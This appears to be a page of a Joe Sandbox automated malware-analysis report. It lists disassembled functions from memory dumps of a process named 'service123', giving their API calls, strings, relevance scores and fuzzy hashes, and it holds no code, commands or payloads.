Instruction ID: 8cb9fc2e726af3e33bc62c88218b3f2c713935c7500e83d37bb3e015762b631c
Opcode Fuzzy Hash: 55781c4551f9fc4960f1e8b5f480cf70b5a9e9bb7e71c4e68c83a988dcb34dd4
Instruction Fuzzy Hash: CE3159706093058FDB40EF2AC5487977BF8FB56319F218219E8988B791D334D849CBA6

Function 6C3582D0 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C3582E5
strlen.MSVCRT ref: 6C358333
memcpy.MSVCRT ref: 6C358350
setlocale.MSVCRT ref: 6C358364
setlocale.MSVCRT ref: 6C35839A

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: ac72b9b989b7d7611e0c45adb3fb3a14dc3373123fa6dfc3bd8604d800fc637a
Instruction ID: a8cad5cea6e844bf6911e43a21522aa9d5dc96ac552b4c3c65191837620efebf
Opcode Fuzzy Hash: ac72b9b989b7d7611e0c45adb3fb3a14dc3373123fa6dfc3bd8604d800fc637a
Instruction Fuzzy Hash: 9821EFB46083509FD340EFA9D48065EFBE0AF88758F44896EE9C88B701E739C9458F82

Function 6C2A9530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C2A9549
_unlock.MSVCRT ref: 6C2A9571
calloc.MSVCRT ref: 6C2A95BF

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: 6fa67a7e9c309e680af5ff4a6dce6bacbe54a0d39bae4b50aa8bbf2225d86507
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: 0F116A706042158FDB00EFAAC480786BBE0AF89344F15C969D898CF745EB32D856CB92

Function 6C2A0290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2A02BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C2A04DE), ref: 6C2A02CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C2A04DE), ref: 6C2A0300

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: d887f09b42df01b01f0cfec33f20979feab72578504ee1406a0946cf43101b7e
Instruction ID: 291c97fe4bf30ecced061f26ee62e9d731a45784aaa1c61fc83404758cf6854b
Opcode Fuzzy Hash: d887f09b42df01b01f0cfec33f20979feab72578504ee1406a0946cf43101b7e
Instruction Fuzzy Hash: 5CF05E709487059FD7007FBAC40835A7EB8FB53328F504A1DE8AA8BAD1E7354019CF66

Function 008F4BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 008F4C27
@, xrefs: 008F4647

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: e0df1f566f90d6899acc3117acfd36d9c3e6a6e51e0308d12a7f1c38c56480e9
Instruction ID: 8c53673e5457418aa42eecc3262d508f5534c32e3e7aeba30428db2b4b82efdc
Opcode Fuzzy Hash: e0df1f566f90d6899acc3117acfd36d9c3e6a6e51e0308d12a7f1c38c56480e9
Instruction Fuzzy Hash: EAA17D316083598BD7219F3480907BBBBE1FB85318F149A1EEAD8D7342D735D94ADB82

Function 6C2A52CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 6C2A4D17
(null), xrefs: 6C2A52F7

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: b2201d8a1b6ee12a8c92e4c46338df48bcf0c08b182cdd06b2fac28239e8f684
Instruction ID: bfc91b20bbf23e47661a4bbca39736e05b3b2f1b2aae9f8a5f9a6fed72ae2e7d
Opcode Fuzzy Hash: b2201d8a1b6ee12a8c92e4c46338df48bcf0c08b182cdd06b2fac28239e8f684
Instruction Fuzzy Hash: 44A17E7160C35A8BD7218EA5C09079BB7E1BB85319F148A2DECDC87741DB35D54B8B82

Function 008F1B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 008F1C20
Unknown pseudo relocation protocol version %d., xrefs: 008F1DF3
Unknown pseudo relocation bit size %d., xrefs: 008F1C6D

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: cb98f5f3ae7f7e79ff5af1b9a44bc8e032850fd11502f3aec41e08128e888810
Instruction ID: 8b6027483347c3e0b76f972f8f991a9537e12927078c51631eb4346c4bb05fce
Opcode Fuzzy Hash: cb98f5f3ae7f7e79ff5af1b9a44bc8e032850fd11502f3aec41e08128e888810
Instruction Fuzzy Hash: D0818E71A00709CBCF14DF78D888679BBF1FB84360F148529DA98E7255E731E8148B96

Function 6C29A850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C29A970
Unknown pseudo relocation bit size %d., xrefs: 6C29A9BD
Unknown pseudo relocation protocol version %d., xrefs: 6C29AB43

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 666affb9c51044d606ef294b6749feebc5c7c445d98bfb8db22e349f11692138
Instruction ID: 1530deaf1d258b01a9dc5990321a3b07c412aac2b0c5a2b8585bdd73ab603985
Opcode Fuzzy Hash: 666affb9c51044d606ef294b6749feebc5c7c445d98bfb8db22e349f11692138
Instruction Fuzzy Hash: 29716972E0631ECFDB10CF6AC580B8AB7B4FB45348F15852AED54ABB14D330E8558BA5

Function 008F80D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 008F80F2
strchr.MSVCRT ref: 008F8102
atoi.MSVCRT ref: 008F8113

Strings

., xrefs: 008F80F7

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: 664605ba29ef6f7e2517a7dad719f02bceacc86d524b179a62a2c17edecf8c6a
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: 0DE0E671904705CAD7407F38C90736A75D1FB41300F458E5CD584C7245DB7994869753

Function 6C2A9128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C2A9142
strchr.MSVCRT ref: 6C2A9152
atoi.MSVCRT ref: 6C2A9163

Strings

., xrefs: 6C2A9147

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 505f93b56d17674917f430adf96e29dc3bbb18f50f8bd546ee062c8e9c381715
Instruction ID: 4ebc03d8be7f71395084cb2652e869bd061741162edba128d597ba724409e318
Opcode Fuzzy Hash: 505f93b56d17674917f430adf96e29dc3bbb18f50f8bd546ee062c8e9c381715
Instruction Fuzzy Hash: 5AE08CB0A047018ED7007FB9C40839AB6E1BB80308F85882CD8888B701E73A842A9B42

Function 6C2A9293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C2A929F
GetProcAddress.KERNEL32 ref: 6C2A92B3

Strings

advapi32.dll, xrefs: 6C2A9298
SystemFunction036, xrefs: 6C2A92A8

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: 927ae423a3cb13a69467ae90c8c290b4525926acbd4853fd44473e969bee1812
Instruction ID: b45b1874247953a1043be6c0c5a21bf9a91c91c3727acdc03a2ad84b2ca7a1f4
Opcode Fuzzy Hash: 927ae423a3cb13a69467ae90c8c290b4525926acbd4853fd44473e969bee1812
Instruction Fuzzy Hash: 01E0E6B1D99300CFCB10BF79950604ABBF4B647320F11496ED4C597600D7359555CFAB

Function 6C2A1409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C2A14D2

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 184fb67e18fa835ed2fc76e0540f5256739a3dc11496ead53e950c7ce809a74b
Instruction ID: 42b0fa64d4a5945a8e63ce57b7a61e5c3ac5e96b25877dbd8ffd1ee5d9d16489
Opcode Fuzzy Hash: 184fb67e18fa835ed2fc76e0540f5256739a3dc11496ead53e950c7ce809a74b
Instruction Fuzzy Hash: F5220175A09785CFC724CFA9C48475ABBE1BF89318F11892EE8D897710D774E846CB42

Function 6C329CD0 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 366COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C329D9C
memset.MSVCRT ref: 6C329DFE

Strings

8O7l0, xrefs: 6C329DA1, 6C329DBD
8O7l0, xrefs: 6C329FB0, 6C329FA4

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memset
String ID: 8O7l0$8O7l0
API String ID: 2221118986-4081508667
Opcode ID: aa63d64683c7a72dca71419dd1cbd60643e0f007b143b72bae7895277c60f5cb
Instruction ID: ec94949b9a9dd0f388fa49d955d6a09b5079d04ed4b68671db6604a2bff41ecd
Opcode Fuzzy Hash: aa63d64683c7a72dca71419dd1cbd60643e0f007b143b72bae7895277c60f5cb
Instruction Fuzzy Hash: 08F137756093018FCB10CF29C98065AB7F5FF8A318B298A5DD8989B714D73AE906CFD1

Function 6C29A340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C29A3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C2AC1CC), ref: 6C29A3E0
free.MSVCRT ref: 6C29A3EA

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 060d1e39b4773854983f3ce1606679a653851dda853a15ccbd927e6b3bdd7ec5
Instruction ID: 35df7c7a9fab916bf4aa7417222432be08d3f80956b634b4be9d6aea66cada7d
Opcode Fuzzy Hash: 060d1e39b4773854983f3ce1606679a653851dda853a15ccbd927e6b3bdd7ec5
Instruction Fuzzy Hash: 1331A175A0971ACBD300AF2BD48471FBBE1AFC1759F211A2DEDA44BB40D7B1D4458782

Function 6C2E59F0 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C2E5B24
memchr.MSVCRT ref: 6C2E5B43

Part of subcall function 6C3582D0: setlocale.MSVCRT ref: 6C3582E5

Strings

., xrefs: 6C2E5B35
-, xrefs: 6C2E5D22

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: c6cad38257bba9bdc3eba45fd6f747bbac6a1e4576e7c1c45dac72f1e6505c53
Instruction ID: ead12a49910682baf891c22ed97e0f669c5dac9d0f480ff3c223576d4e2b7e1d
Opcode Fuzzy Hash: c6cad38257bba9bdc3eba45fd6f747bbac6a1e4576e7c1c45dac72f1e6505c53
Instruction Fuzzy Hash: F1D138B49147198FCB00DFA8C484A8EBBF1BF48304F558A2AE898EB755D734D945CF92

Function 6C2E5E30 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C2E5F5E
memchr.MSVCRT ref: 6C2E5F7D

Part of subcall function 6C3582D0: setlocale.MSVCRT ref: 6C3582E5

Strings

., xrefs: 6C2E5F6F
6, xrefs: 6C2E6166

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: f5588aa4ffb1f5801938c241e04b5ffed97c9013a6c1de9232b0a829c8d586d9
Instruction ID: 0aa67883403b7f1fa02708bd98129552ab4ae8514f94c2040ec1eb18831929b0
Opcode Fuzzy Hash: f5588aa4ffb1f5801938c241e04b5ffed97c9013a6c1de9232b0a829c8d586d9
Instruction Fuzzy Hash: 30D126B19183599FCB00DFA8C480A8EBBF1BF48314F54862AE8A4EB751D734D945CF92

Function 6C360D40 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C360D85

Strings

basic_string::append, xrefs: 6C360DFD, 6C360E09, 6C360EFC, 6C360FBC

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: 4477b8f00d30b11517440bd95a9a6584c124f76e20376f2cbfca24f8c7dd0ca0
Instruction ID: 2caade12de1f4c2fa750fa182aa6b7a8dde82a627980b0ab00b1a69e3af86f2a
Opcode Fuzzy Hash: 4477b8f00d30b11517440bd95a9a6584c124f76e20376f2cbfca24f8c7dd0ca0
Instruction Fuzzy Hash: 95A17A71A042548FCB00EF29C58469EBBF1FF89314F108969E8988BB49D735E848CF92

Function 6C2FB080 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6C2F972F), ref: 6C2FB0E6
memcpy.MSVCRT(?,?,?,?,?,?,6C2F972F), ref: 6C2FB151
memcpy.MSVCRT(00000000,?,?,6C2F972F), ref: 6C2FB198

Strings

basic_string::assign, xrefs: 6C2FB1B3

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: bbb401b19e24b0f97dfb859023fabe949bd82ae34a16acfded64fab40a37562b
Instruction ID: 9ef0b8cbbab35efd54d9c37099c186931f9b6cd303a8bfb5bf043c741fe4d917
Opcode Fuzzy Hash: bbb401b19e24b0f97dfb859023fabe949bd82ae34a16acfded64fab40a37562b
Instruction Fuzzy Hash: 4A518F71B4A61A8BD714DF2DC48461FFBE5FF85709B10866DE8A48B718E7319806CB82

Function 6C3041C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C304221
memcpy.MSVCRT ref: 6C30428F
memcpy.MSVCRT ref: 6C3042C8

Strings

basic_string::assign, xrefs: 6C3042E4

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 9d59abcf367da6a17f72b2adc94fd0e31ae3b42611933dbb7ea65069fe03eac6
Instruction ID: 218ddbd15937bbd9cea5a656d9239ce4ad62fe7fd97bfb9ab8f62bb13c6ed987
Opcode Fuzzy Hash: 9d59abcf367da6a17f72b2adc94fd0e31ae3b42611933dbb7ea65069fe03eac6
